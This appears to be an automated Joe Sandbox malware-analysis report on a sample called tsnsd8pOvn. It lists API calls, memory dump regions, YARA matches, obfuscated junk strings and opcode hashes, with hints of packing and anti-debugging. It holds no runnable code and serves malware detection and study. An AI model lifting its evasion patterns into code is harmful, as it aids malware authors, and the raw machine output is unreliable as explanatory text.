                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: AttributesFile
                                • String ID: apfHQ$o
                                • API String ID: 3188754299-2999369273

                                Control-flow Graph

                                control_flow_graph 238 402020-402025 call 40c120 240 40202a call 402040 238->240
                                APIs
                                • ___security_init_cookie.LIBCMTD ref: 00402025
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: ___security_init_cookie
                                • String ID:
                                • API String ID: 3657697845-0

                                Control-flow Graph

                                control_flow_graph 242 2178485-21784bf call 2178798 245 21784c1-21784f4 VirtualAlloc call 2178512 242->245 246 217850d 242->246 248 21784f9-217850b 245->248 246->246 248->246
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 021784D6
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147222942.0000000002178000.00000040.00000020.00020000.00000000.sdmp, Offset: 02178000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2178000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0

                                Control-flow Graph

                                control_flow_graph 252 41ec70-41ec87 LocalAlloc
                                APIs
                                • LocalAlloc.KERNELBASE(00000000,?), ref: 0041EC7B
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: AllocLocal
                                • String ID:
                                • API String ID: 3494564517-0
                                APIs
                                • InterlockedIncrement.KERNEL32(00429CB0), ref: 00411507
                                • __invoke_watson_if_error.LIBCMTD ref: 00411546
                                • OutputDebugStringW.KERNEL32(Second Chance Assertion Failed: File ), ref: 00411553
                                • OutputDebugStringW.KERNEL32(HBB), ref: 0041157B
                                • OutputDebugStringW.KERNEL32(, Line ), ref: 00411586
                                • OutputDebugStringW.KERNEL32(?), ref: 00411593
                                • OutputDebugStringW.KERNEL32(00424234), ref: 0041159E
                                • _wcscat_s.LIBCMTD ref: 00411754
                                  • Part of subcall function 0041A6A0: __invalid_parameter.LIBCMTD ref: 0041A712
                                • __invoke_watson_if_error.LIBCMTD ref: 0041175D
                                  • Part of subcall function 004050F0: __invoke_watson.LIBCMTD ref: 00405111
                                • _wcscat_s.LIBCMTD ref: 0041178C
                                  • Part of subcall function 0041A6A0: _memset.LIBCMT ref: 0041A77F
                                  • Part of subcall function 0041A6A0: __invalid_parameter.LIBCMTD ref: 0041A7DB
                                • __invoke_watson_if_error.LIBCMTD ref: 00411795
                                • __snwprintf_s.LIBCMTD ref: 004117EE
                                  • Part of subcall function 00412320: __vsnwprintf_s_l.LIBCMTD ref: 00412342
                                • __invoke_watson_if_oneof.LIBCMTD ref: 00411827
                                • _wcscpy_s.LIBCMTD ref: 0041186C
                                • __invoke_watson_if_error.LIBCMTD ref: 00411875
                                • __invoke_watson_if_oneof.LIBCMTD ref: 004118FD
                                • _wcscpy_s.LIBCMTD ref: 0041193B
                                • __invoke_watson_if_error.LIBCMTD ref: 00411944
                                • __itow_s.LIBCMTD ref: 0041153D
                                  • Part of subcall function 0041AA90: _xtow_s@20.LIBCMTD ref: 0041AABB
                                • __strftime_l.LIBCMTD ref: 004115F3
                                • __invoke_watson_if_oneof.LIBCMTD ref: 0041162C
                                • _wcscpy_s.LIBCMTD ref: 00411671
                                • __invoke_watson_if_error.LIBCMTD ref: 0041167A
                                • _wcscpy_s.LIBCMTD ref: 004116CD
                                • __invoke_watson_if_error.LIBCMTD ref: 004116D6
                                • _wcscat_s.LIBCMTD ref: 00411707
                                • __invoke_watson_if_error.LIBCMTD ref: 00411710
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __invoke_watson_if_error$DebugOutputString$_wcscpy_s$__invoke_watson_if_oneof_wcscat_s$__invalid_parameter$IncrementInterlocked__invoke_watson__itow_s__snwprintf_s__strftime_l__vsnwprintf_s_l_memset_xtow_s@20
                                • String ID: %s(%d) : %s$(*_errno())$, Line $HAB$HBB$P$Second Chance Assertion Failed: File $_CrtDbgReport: String too long or IO Error$_CrtDbgReport: String too long or Invalid characters in String$_VCrtDbgReportW$_itow_s(nLine, szLineMessage, 4096, 10)$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrptt.c$strcpy_s(szOutMessage2, 4096, "_CrtDbgReport: String too long or Invalid characters in String")$wcscat_s(szLineMessage, 4096, L"\n")$wcscat_s(szLineMessage, 4096, L"\r")$wcscat_s(szLineMessage, 4096, szUserMessage)$wcscpy_s(szLineMessage, 4096, szFormat ? L"Assertion failed: " : L"Assertion failed!")$wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")$wcscpy_s(szUserMessage, 4096, L"_CrtDbgReport: String too long or IO Error")$wcstombs_s(&ret, szaOutMessage, 4096, szOutMessage, ((size_t)-1))$wcstombs_s(((void *)0), szOutMessage2, 4096, szOutMessage, ((size_t)-1))
                                • API String ID: 2252013794-1089446412
                                APIs
                                • BuildCommDCBAndTimeoutsA.KERNEL32(Jed,?,00000000), ref: 0041ED8D
                                • SetComputerNameW.KERNEL32(00000000), ref: 0041ED95
                                • LoadLibraryW.KERNEL32(00000000), ref: 0041ED9D
                                • FreeLibraryAndExitThread.KERNEL32(00000000,00000000), ref: 0041EDA7
                                • GetVersionExA.KERNEL32(?), ref: 0041EDB4
                                • VerifyVersionInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041EDC2
                                • OpenFile.KERNEL32(00000000,?,00000000), ref: 0041EDD3
                                • SetHandleInformation.KERNEL32(00000000,00000000,00000000), ref: 0041EDDF
                                • DeactivateActCtx.KERNEL32(00000000,00000000), ref: 0041EDE9
                                • GetTapeParameters.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041EDFE
                                • GetTempFileNameA.KERNEL32(Fup,Duyobegug kafukeyof ginukin tubosone xajinodafit,00000000,?), ref: 0041EE17
                                • GetConsoleDisplayMode.KERNEL32(00000000), ref: 0041EE1F
                                • GetConsoleDisplayMode.KERNEL32(00000000), ref: 0041EE27
                                • GetDriveTypeW.KERNEL32(Feliyo xumomoxabeya), ref: 0041EE32
                                • RequestWakeupLatency.KERNEL32(00000000), ref: 0041EE3A
                                • TlsSetValue.KERNEL32(00000000,00000000), ref: 0041EE44
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: ConsoleDisplayFileLibraryModeNameVersion$BuildCommComputerDeactivateDriveExitFreeHandleInfoInformationLatencyLoadOpenParametersRequestTapeTempThreadTimeoutsTypeValueVerifyWakeup
                                • String ID: Duyobegug kafukeyof ginukin tubosone xajinodafit$Feliyo xumomoxabeya$Fup$Jed
                                • API String ID: 3212926557-3060799460
                                APIs
                                • CreateNamedPipeA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041EEE4
                                • WaitForMultipleObjects.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041EF20
                                • DeleteVolumeMountPointA.KERNEL32(Gatuwoxa yudesozuja nuxo bavisiyoxopav), ref: 0041EFAC
                                • GetSystemPowerStatus.KERNEL32(00000000), ref: 0041EFC9
                                • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041EFDE
                                • OpenThread.KERNEL32(00000000,00000000,00000000), ref: 0041F005
                                • GetProcessPriorityBoost.KERNEL32(00000000,00000000), ref: 0041F00F
                                • RequestWakeupLatency.KERNEL32(00000000), ref: 0041F017
                                • CreateJobObjectA.KERNEL32(00000000,00000000), ref: 0041F04D
                                Strings
                                • Gatuwoxa yudesozuja nuxo bavisiyoxopav, xrefs: 0041EFA7
                                • Neyobatud ziyigo fuhuruh mag puyojidiz, xrefs: 0041F0C5
                                • Ribomavepahi bulihunosawimu pofuno nupoji, xrefs: 0041F0C0
                                • , xrefs: 0041EEFC
                                • Nawihuxoxu, xrefs: 0041F0CA
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: CreateVolume$BoostDeleteInformationLatencyMountMultipleNamedObjectObjectsOpenPipePointPowerPriorityProcessRequestStatusSystemThreadWaitWakeup
                                • String ID: $Gatuwoxa yudesozuja nuxo bavisiyoxopav$Nawihuxoxu$Neyobatud ziyigo fuhuruh mag puyojidiz$Ribomavepahi bulihunosawimu pofuno nupoji
                                • API String ID: 3118345774-247417240
                                • Opcode ID: 408affb7e5265512a0ecf07fee047435b55b5ce2af9136c74d55d44da700ae1d
                                • Instruction ID: 1704b2e87fcd135584f6b4e7ed04564e9953a6cf692821136d82c7357fdf8e43
                                • Opcode Fuzzy Hash: 408affb7e5265512a0ecf07fee047435b55b5ce2af9136c74d55d44da700ae1d
                                • Instruction Fuzzy Hash: 51713874E04209DFDB60CFA8E845BAEBBB0FB48715F10812AE915B7391C3746945CF99
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset$_free_malloc_strstr$_wcsstr
                                • String ID: "
                                • API String ID: 430003804-123907689
                                • Opcode ID: 1cdb3d0636dac09cc2f24788c7c1d72f8c986b6e2997366a203cf509162b2016
                                • Instruction ID: eb070e3902d3a8affaf5e1edfc613bf96d92d3dfcb13f7bc620876f42c3fa925
                                • Opcode Fuzzy Hash: 1cdb3d0636dac09cc2f24788c7c1d72f8c986b6e2997366a203cf509162b2016
                                • Instruction Fuzzy Hash: F84214B1418391ABD720DFA4CC48F9B7BE8BF45308F44092DF98997195DB76D608CBA2
                                APIs
                                • EnumTimeFormatsW.KERNEL32(00000000,00000000,00000000), ref: 0041F11E
                                • DebugActiveProcessStop.KERNEL32(00000000), ref: 0041F126
                                • EnterCriticalSection.KERNEL32(00000000), ref: 0041F12E
                                • CopyFileExW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041F176
                                • IsBadReadPtr.KERNEL32(00000000,00000000), ref: 0041F192
                                • GetConsoleMode.KERNEL32(00000000,00000000), ref: 0041F1AD
                                • FlushConsoleInputBuffer.KERNEL32(00000000), ref: 0041F1B5
                                • LoadResource.KERNEL32(00000000,00000000), ref: 0041F1BF
                                • GetConsoleOutputCP.KERNEL32 ref: 0041F1F0
                                • AddConsoleAliasW.KERNEL32(00000000,00000000,00000000), ref: 0041F1FC
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: Console$ActiveAliasBufferCopyCriticalDebugEnterEnumFileFlushFormatsInputLoadModeOutputProcessReadResourceSectionStopTime
                                • String ID:
                                • API String ID: 1368446300-0
                                • Opcode ID: 540f0b82778843b62b3be6d3548d5c35a36a604577bf0d1d00222f20f7887451
                                • Instruction ID: 57af4abef105eddbb397afd99020a63fbc50d4452f8b0965d041af8086ec4dbd
                                • Opcode Fuzzy Hash: 540f0b82778843b62b3be6d3548d5c35a36a604577bf0d1d00222f20f7887451
                                • Instruction Fuzzy Hash: BE312A30B44208EBEB60DFA4EC49B9DB7B1BB58701F108169EA15A6290C7745986CB5D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset
                                • String ID: <$x2Q
                                • API String ID: 2102423945-643667464
                                • Opcode ID: 273cca7cb529547cd63a08c43d9310bac8ca78855d9082cfb023d6999fed1edd
                                • Instruction ID: c83136bd6ebad08ecf581bf5a4b0c93146a331f0dae53a1fdd753c495521b90b
                                • Opcode Fuzzy Hash: 273cca7cb529547cd63a08c43d9310bac8ca78855d9082cfb023d6999fed1edd
                                • Instruction Fuzzy Hash: C5D2E371524351ABD724EFA0DC94BAFB7E6BF84308F40092DE48587298DB76A50DCF92
                                APIs
                                • _wcsstr.LIBCMT ref: 0221E72D
                                • _wcsstr.LIBCMT ref: 0221E756
                                • _memset.LIBCMT ref: 0221E784
                                  • Part of subcall function 0225FC0C: std::exception::exception.LIBCMT ref: 0225FC1F
                                  • Part of subcall function 0225FC0C: __CxxThrowException@8.LIBCMT ref: 0225FC34
                                  • Part of subcall function 0225FC0C: std::exception::exception.LIBCMT ref: 0225FC4D
                                  • Part of subcall function 0225FC0C: __CxxThrowException@8.LIBCMT ref: 0225FC62
                                  • Part of subcall function 0225FC0C: std::regex_error::regex_error.LIBCPMT ref: 0225FC74
                                  • Part of subcall function 0225FC0C: __CxxThrowException@8.LIBCMT ref: 0225FC82
                                  • Part of subcall function 0225FC0C: std::exception::exception.LIBCMT ref: 0225FC9B
                                  • Part of subcall function 0225FC0C: __CxxThrowException@8.LIBCMT ref: 0225FCB0
                                • _wcsstr.LIBCMT ref: 0221EA0C
                                • _memset.LIBCMT ref: 0221EE5C
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Exception@8Throw$_wcsstrstd::exception::exception$_memset$std::regex_error::regex_error
                                • String ID:
                                • API String ID: 1338678108-0
                                • Opcode ID: b5098284881af2f016dff51b4d469be074dfe0eb5f9feb8c37e34c07e0411b24
                                • Instruction ID: f8724f67475b2bbc30b1e089736d2ef1c53ffcfae249e096718bb8aefcaef556
                                • Opcode Fuzzy Hash: b5098284881af2f016dff51b4d469be074dfe0eb5f9feb8c37e34c07e0411b24
                                • Instruction Fuzzy Hash: AC52EDB1A103199FCF24CFA8CC80BAEBBF5BF14304F154569E806AB289D7719A45CF91
                                APIs
                                • IsDebuggerPresent.KERNEL32 ref: 004191AD
                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004191C4
                                • UnhandledExceptionFilter.KERNEL32(004261B0), ref: 004191CF
                                • GetCurrentProcess.KERNEL32(C0000409), ref: 004191ED
                                • TerminateProcess.KERNEL32(00000000), ref: 004191F4
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                • String ID:
                                • API String ID: 2579439406-0
                                • Opcode ID: 3de15c23e80d2af340f2690530d556acc0573896fa4d5d9eed28186c07cf00f0
                                • Instruction ID: e1cde53ab6f7dd812c8a3c1a5448c4efbae9bd4b37550eaa4797c13b4980f94e
                                • Opcode Fuzzy Hash: 3de15c23e80d2af340f2690530d556acc0573896fa4d5d9eed28186c07cf00f0
                                • Instruction Fuzzy Hash: A421F0B4901308ABC720DF29FC856953BA4BB18305F50423AEC0C92772E775599ACF4D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: $
                                • API String ID: 0-3993045852
                                • Opcode ID: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
                                • Instruction ID: 5f3debaf955edd79e9130d3897c7d051f51b5e91f73c4c39b537367b3f7b638c
                                • Opcode Fuzzy Hash: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
                                • Instruction Fuzzy Hash: 013253B1E1022D9BDF619FA4CC44BAEB7B9FF45704F0041EAEA0CA6154DB748A84CF59
                                APIs
                                • SetUnhandledExceptionFilter.KERNEL32(Function_0000C090), ref: 0040C10A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: ExceptionFilterUnhandled
                                • String ID:
                                • API String ID: 3192549508-0
                                • Opcode ID: 0cc9ef21937408120f2dacae10aad833f77879a01fde0243f18665b7737a3532
                                • Instruction ID: 5ba00875492902686897453746a4916a0c7d599069e825d5fd26b7135f919676
                                • Opcode Fuzzy Hash: 0cc9ef21937408120f2dacae10aad833f77879a01fde0243f18665b7737a3532
                                • Instruction Fuzzy Hash: 92B01231244208A7426013F26C09A177ACCC5C87343910131F10C81441D8629851C459
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 851fc9b6f54d0d524cfed56ff25d709cf64ba4b7deb611180c80db8baab8909e
                                • Instruction ID: 46327a6ffcf01737d384b5e55774bc4eb435bba024bb7c39dace0ea7e734429b
                                • Opcode Fuzzy Hash: 851fc9b6f54d0d524cfed56ff25d709cf64ba4b7deb611180c80db8baab8909e
                                • Instruction Fuzzy Hash: F461A3339046BB5BDB649E6DD8401A9B7A2BFC4310F5B8A75DC9823642C234EA11DBD0
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e99aa2f60f3c65b998b8173ecf6d62a85e0283f60168b484be672eab7d553dce
                                • Instruction ID: a49abdeeff31885ef7adf1e13a09e4cc85c31e865af0639e92621e6fe9bedf83
                                • Opcode Fuzzy Hash: e99aa2f60f3c65b998b8173ecf6d62a85e0283f60168b484be672eab7d553dce
                                • Instruction Fuzzy Hash: E3617C3791262B9BD761DF59D84527AB3A2EFC4360F6B8A358C0427642C734F9119BC4
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 213e8dd87d5c2f66bb6fb1c01bf5d713fa88062fa37de47d36406d71930442ef
                                • Instruction ID: 5d7ef95346197403c2fa1e60d26013a61137f192ad06f1a01e8f1834b8985e47
                                • Opcode Fuzzy Hash: 213e8dd87d5c2f66bb6fb1c01bf5d713fa88062fa37de47d36406d71930442ef
                                • Instruction Fuzzy Hash: 4451DD229257B945EBC3DA3D88504BEBBE0BE49106B460557DCD0B3181C72EDE4DB7E4
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7d91c7687d8e85e62bc80eb2502b46881ecafdad5d685667df6fa97b6554fb78
                                • Instruction ID: f0ef39fb87bbcbabf7c087ccc32622f448b38fccad3fa450d398332d7bff4148
                                • Opcode Fuzzy Hash: 7d91c7687d8e85e62bc80eb2502b46881ecafdad5d685667df6fa97b6554fb78
                                • Instruction Fuzzy Hash: C4417C72E1872E47E34CFE169C9421AB39397C0250F4A8B3CCE5A973C1DA35B926C6C1
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147222942.0000000002178000.00000040.00000020.00020000.00000000.sdmp, Offset: 02178000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2178000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
                                • Instruction ID: 4cdd23c1f06e0bb37bf26fb3ad0901fd171c6f7fdf606d9b9149510f57d76385
                                • Opcode Fuzzy Hash: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
                                • Instruction Fuzzy Hash: A731697588A2459FCB15CE70D891AB5BB71EFC7224F1999ECC0858B106D336504ACB94
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: dad9f5e2b4397fc96ae248ae23b4bb8b0f73d482c6b1a500fc30c3239f901945
                                • Instruction ID: 0490d86b4bce045c3c4fd50df124024f9d30e3e971c92668636fd4ef92e6cccb
                                • Opcode Fuzzy Hash: dad9f5e2b4397fc96ae248ae23b4bb8b0f73d482c6b1a500fc30c3239f901945
                                • Instruction Fuzzy Hash: 40315E7682976A4FC3D3FE61894010AF291FFC5118F4D4B6CCD505B690D73EAA4A9A82
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: aca7381c331421ab033d5a8929ad27c90a0d590f00afa5b17f2b634ed140bded
                                • Instruction ID: 352a18da36c28492ad9ccbbe0d65539e74c5f158f4323e103da35fb91b5cda5c
                                • Opcode Fuzzy Hash: aca7381c331421ab033d5a8929ad27c90a0d590f00afa5b17f2b634ed140bded
                                • Instruction Fuzzy Hash: 703112306283419FD741EF69C880A4BFBE1FFD8258F11D919F9889B225D730E985CA62
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                • Instruction ID: 83096edb3c103a7745057ffcfcfcac84c965f1cb31d17871bae80da4432c24ea
                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                • Instruction Fuzzy Hash: 89110BF727108343D73A86ADD8B46B6E395EBC632972C427AD14A4B65CD322D1669600
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
                                • Instruction ID: 2b0f342ab9d0a276d3eccf7b5ebc062fb01e8aa9e8f2e76db9cf2f3c0cf90140
                                • Opcode Fuzzy Hash: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
                                • Instruction Fuzzy Hash: 47114F0A8492C4BDCF424A7840E56EBFFA58E3B218F4A71DAC8C44B743D01B150FE7A1
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                • Instruction ID: 381cae556dd3feeb35d9d5a494274e5c54357251123f432acef734e90cbfd476
                                • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                • Instruction Fuzzy Hash: 0C1182723501009FD754DFA5DC90FA673EAFB98320B198165ED08CB315D675E941C760
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147222942.0000000002178000.00000040.00000020.00020000.00000000.sdmp, Offset: 02178000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2178000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                • Instruction ID: b1e8e240dabc08e65b3ec60d9a2c3341bca6dfd0670f22dbb7b54c912d73a97e
                                • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                • Instruction Fuzzy Hash: 1D118EB2380100AFD754DF55DC84FA673EAEB89360B1A8169ED08CB312D776E842CB60
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f7a2a3c4e4e7b1265b14b7c3247eccdedd29083849295e66ade5a7e6f19b4579
                                • Instruction ID: 47ba753f581fde9d96b7c037f35bfa0f67b3519018e9c849d415aec83b912b71
